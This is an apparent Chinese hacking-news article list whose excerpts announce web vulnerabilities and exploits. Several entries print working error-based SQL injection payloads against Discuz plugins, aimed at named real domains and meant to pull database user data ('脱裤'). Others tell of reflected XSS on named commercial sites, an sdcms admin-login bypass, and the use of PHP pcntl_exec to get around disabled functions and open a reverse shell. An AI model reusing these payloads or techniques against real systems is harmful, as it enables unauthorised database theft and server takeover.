文章列表
百游网(baiyou100.com)主站分站 多处反射型XSS跨站漏洞
百游网(baiyou100.com)主站分站 多处反射型XSS跨站漏洞
Xiuno BBS XSS Vulnerability 简单的xss白盒分析
前言 刷微博的时候看到到seay发个了霸气外泄的cms:http://www.cnseay.com/2660/,官方介绍 Xiuno 这个名字来源于圣斗士星矢白羊座的黄金圣斗士修罗,他的攻击速度和战斗力是十二宫最强的,他是速度和力量的化身;在佛教里面,修罗为六道之一,处于人道和天道之间的一道,半人半神,性情刚烈,好战
京东商城(jd.com)tp分站 反射型XSS跨站漏洞
京东商城(jd.com)tp分站 反射型XSS跨站漏洞
DZx2.5 插件漏洞sql注入 {科普脱裤}
作者:j8ghttp://nba2kol.org/plugin.php?id=v63shop:goods&pac=info&gid=110%20or%20@`'`%20and%20(select%20*%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20user()))a%20from%20information_schema.tables%20group%20by%20a)b)%20or%20@`'`直接看图吧~~=========================
Facebook Home遭黑客修改:可移植到其他手机上
黑客们的实力真的不能小瞧。在Facebook Home定制系统登陆Google Play商店仅仅几个小时之后,黑客们便对Facebook Home系统的启动项进行了修改,去除了Facebook Home目前只能用于HTC First等特定设备的限制。这意味着现在Facebook Home系统已经可以被应用到所有的Android手机上。 才华横溢的黑客
最新Discuz交友插件漏洞附EXP
DZ交友插件漏洞jiaoyou.php?pid=1有的注入需要登录,注入代码如下:' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x
最新DZ X2.5 0DAY (By saviour) 附EXP
DZ 插件注入漏洞!前几天看COG发布 但阅读权限得200 (管理员才可以查看) 刚去看了下已经公开了 所以我就转过来了Exp:http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from informatio
PHP被遗漏的执行函数
我见很多管理员在封杀PHP危险函数的时候一般都是这样的:disable_functions = proc_open,exec,passthru,shell_exec,system,popen但是如果编译PHP时带--enable-pcntl参数就危险了,可以用pcntl_exec函数执行指定程序,也可以反弹一个SHELL,在PHPINFO里查看编译参数。描述:pcntl_exec — 在当前进程空
sdcms2.0后台绕过直接进入
By Cr4zyIslogin //判断登录的方法sub islogin()if sdcms.strlen(adminid)=0 or sdcms.strlen(adminname)=0 then dim t0,t1,t2t0=sdcms.getint(sdcms.loadcookie("adminid"),0) loadcookie t1=sdcms.loadcookie("islogin")t2=sdcms.loadcookie("loginkey")if sdcms.strlen(t0)=0 or sdcms.strlen(t1)=
几小时即可使互联网瘫痪的黑客已加入谷歌
计算机安全专家Peter Zatko提到Peter Zatko或许知道的人没多少,但如果提到Mudge或许熟知的人就比较多了。是的,Mudge(下文使用其真实原名:Peter Zatko)是世界著名黑客小组CDC和“黑客智囊团”L0pht的成员,他曾宣称几小时内便可令互联网瘫痪。而后他作为一名计算机安全专家,投身于美国国防部领导
